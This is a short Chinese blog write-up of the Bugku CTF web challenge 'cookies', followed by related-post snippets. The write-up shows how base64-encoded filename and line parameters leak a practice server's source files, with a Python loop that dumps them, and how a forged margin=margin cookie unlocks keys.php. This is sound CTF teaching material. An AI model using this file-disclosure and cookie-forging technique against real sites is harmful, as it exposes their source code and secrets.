BUGKU-Web-cookies-思路

原创已于 2022-10-14 11:28:20 修改 · 208 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#php #python

于 2022-10-14 11:05:31 首次发布

CTF 专栏收录该内容

1 篇文章

订阅专栏

1、通过/index.php?line=&filename=a2V5cy5waHA=，然后base64解码a2V5cy5waHA=得到文件是keys.txt。在line后面输入参数1、2、3，发现可以出现对应的行，通过程序批量请求得到 keys.txt。

# -*- coding: utf-8 -*-
import requests
def main():
    for i in range(20):
        url = "http://114.67.175.224:14679/index.php?line="+str(i)+"&filename=aW5kZXgucGhw"
        res = requests.get(url)
        print(res.text)

# -----------------------------------------------------------------------------------------
if __name__ == "__main__":
    main()

2、阅读得到的keys.txt，是一个php 文件，其中需要写Cookie为margin=margin，就可以设置$file_list[2]='keys.php';。这样设置filename为 keys.php （base64加密为 a2V5cy5waHA=）就可以读到返回结果啦。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Engineer21

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

Bugku-web之cookies

weixin_42939822的博客

03-13

1697

一打开题目，发现一系列重复的字符串，受到“备份是个好习惯”题目的影响，不自觉地对这串字符串进行了各种解密，无果…… 此时思路堵塞，无意间看到url中的payload格式，对filename变量进行了base64解码，得到了keys.txt的结果。想到可能存在php常见的文件包含问题，于是对filename变量进行了更改，变更为index.php的base64加密，同时猜测line变量表示源码的行数，先另line=3，进行尝试，喜得猜想结果。于是编写脚本，对index.php的源码进行提取。

[Bugku] web-CTF靶场系列详解①！！！

muyuchen110的博客

07-30

1527

平台为“山东安信安全技术有限公司”自研CTF/AWD一体化平台，部分赛题采用动态FLAG形式，避免直接抄袭答案。

参与评论您还未登录，请先登录后发表或查看评论

Bugku：web cookies欺骗

qq_26961571的博客

07-10

361

打开这道题。发现全是一堆乱码！！马上打开源代码进行查看。也是一堆乱码！！！一点头绪没有。直到发现了网页的链接有问题，比普通的网页多出来了line，filename？？？哦吼，所以这里有猫腻。用base64解码之后发现filename=keys.txt 尝试使用index.php看看有没有源代码，但是依然要用base64加密index.php才可以打开。打开之后发现一片空白，后来在line=后面添加数字之后就出现了源...

Bugku-Web-cookie欺骗.docx

05-16

Bugku-Web-cookie欺骗看到url上的参数有base64，解码发现是key.txt 把改参数换成index.php，观察发现line按行返回所以自己练练手写了个脚本跑出来

Bugku-WEB-cookies欺骗（缺一个python脚本）

Jaychouzzk

11-24

473

题目：这里注意到filename=a2V5cy50eHQ=,应该是base64编码，解码一下，得到了keys.txt 想想应该怎么利用一下呢。题目是cookies欺骗，可能keys.txt中应该存在我们所需要的cookies 解题：这里想错了。。没仔细去看url，明显是打开的keys.txt才输出的这么多字符串，line应该是对应的行数尝试打开index.php看看是否能将其...

BugkuCTF~Web~WriteUp

weixin_30338497的博客

02-16

6614

今天把之前做的题整理一下，方便有需要的人学习φ(゜▽゜*)♪ 1、web2 考点：F12的利用 Topic Link：http://123.206.87.240:8002/web2/ 打开连接，特别的不一样，直接F12可得flag get flag: flag KEY{Web-2-bugKssNNikls9100} 2、计算器考点：F12的利用 T...

BUGKU-WEB cookies

默默提升实验室

03-12

1724

BUGKU-WEB cookie欺骗

BUGKU-WEB 留言板

默默提升实验室

02-07

1918

BUGKU-WEB 留言板

Bugku---web---速度要快

weixin_47450099的博客

07-12

1744

学习到cookie，提示利用python脚本建立与服务器之间的交互功能，以此查看flag

CTF|BugkuCTF-WEB解题思路

这里是一处长期不更新的博客

06-15

2300

截止至练习题【login4】，仅提供解题思路。 WEB2 按F12直接可得flag 计算器：直接按F12，将maxlength修改，输入正确结果即可得到flag web基础$_GET URL输入：http://123.206.87.240:8002/get/?what=flag web基础$_POST 使用hackbar工具，按F12，打开Post data，传递what=flag。矛盾这里是使用is_numeric遇到%00截断的漏洞,这里构造 http://120.24.86.145:8002.

BugkuCTF-WEB-第43题到第52题

Alita_lxz的博客

11-04

1431

BugkuCTF-WEB-第43题到第52题

bugku web/crypto 系列题目思路总结（三）

yukinorong的博客

08-07

726

bugku 告诉你一个秘密参考博文：https://www.jianshu.com/p/3cacf1dd479c 需要了解base64编码特征才能想到。利用键盘位置做密码很巧妙。 bugku 这不是md5 确实不是md5，十六进制字符串直接转字符即可。 bugku 贝斯家族 base编码系列除了64之外还有16 32 36 58 62 91等。后面的数字为用于编码的种类，数字越大，一般来讲编码...

bugku web cookies欺骗

weixin_43928140的博客

05-20

792

记录菜鸡生活的第十二天首先打开题目时一串字符串了开始没啥想法，但是注意到了后面的url然后拿去解密，发现是keys.txt，放上去试一下发现没有内容了，然后再思考一下，看这个url里面?后面有两个参数，一个line一个filename，然后filename后面是用的base64编码格式，就感觉filename传递的就是 base64密文格式，然后u传给后台的base64.decode()...

国内常用的网站源码及服务商介绍

weixin_42832157的博客

12-01

431

网站源码建站的优势包括：生态多元化，可适配多场景需求；兼具安全稳定特性与轻量化、高性价比选择；支持社区互动功能与垂直行业深度定制；融合国产数据库适配与低代码技术，更高效便捷，且贴合本土使用需求，能满足不同用户的核心建站诉求。

DC5通关及溯源分析

yiduiguwen的专栏

12-02

273

对靶机扫描发现，开放了80端口和111端口，其中111端口没啥特殊服务，真正的入口只有80端口，80端口用的是nginx 1.6.2。对网站进行目录扫描，发现有个footer.php，推断可能文件包含的问题，有可能footer.php是通过参数传过去的。同时，发现有个留言界面，注意到提交留言后，footer.php的年份不一样。文件包含有两个条件，一是有文件包含的代码，二是能够获取到传递的参数。因此，下一步的思路就是爆破隐藏的url参数。

JienDa聊PHP：电商实战中主流PHP框架的协同策略与架构优化

Jien Da官方博客

11-29

1180

摘要本报告探讨了在复杂电商系统中如何协同使用Laravel、Symfony和Yii三大PHP框架。电商系统具有业务复杂、高并发、快速迭代等特点，单一框架难以满足所有需求。报告分析了各框架的优势：Laravel适合快速开发前端和管理后台，Symfony适用于高并发核心交易服务，Yii则擅长高性能API和后台系统。提出了三种协同架构模式：主从混合式架构（以Laravel为主集成其他框架）、微服务异构架构和模块化单体架构，并提供了具体实施策略和代码示例。为技术团队提供了可行的框架协同方案，以优化电商系统架构。

《零基础学PHP：从入门到实战》教程-模块七：MySQL 数据库基础-4

zwh821的博客

12-03

282

PHP连接MySQL数据库操作指南本章介绍了使用PHP的mysqli扩展连接和操作MySQL数据库的核心方法。主要内容包括：两种编程风格：面向对象和面向过程方式，推荐使用面向对象风格数据库连接：建立连接的标准流程和必要的错误处理 SQL操作： SELECT查询及结果处理 INSERT/UPDATE/DELETE操作安全防护：重点讲解SQL注入攻击原理演示不安全的字符串拼接方式的风险推荐使用预处理语句（prepare/bind_param/execute）作为唯一正确的防护手段通过代码示例展示

如何解决ws2_32.dll丢失问题：解决网络相关错误和程序崩溃的完美方案

xiaoshuotui的博客

12-02

927

当你尝试启动一个程序或游戏时，突然遭遇“ws2_32.dll丢失”的错误，这可能会让你的计划受阻。幸运的是，这个问题通常有直接的解决方法。本文将详细介绍如何找出丢失或损坏的ws2_32.dll文件，并提供有效的修复策略，让你的电脑重新运行起来。

前端运行PHP 快速上手使用 PHPStudy Pro 详细搭建与使用指南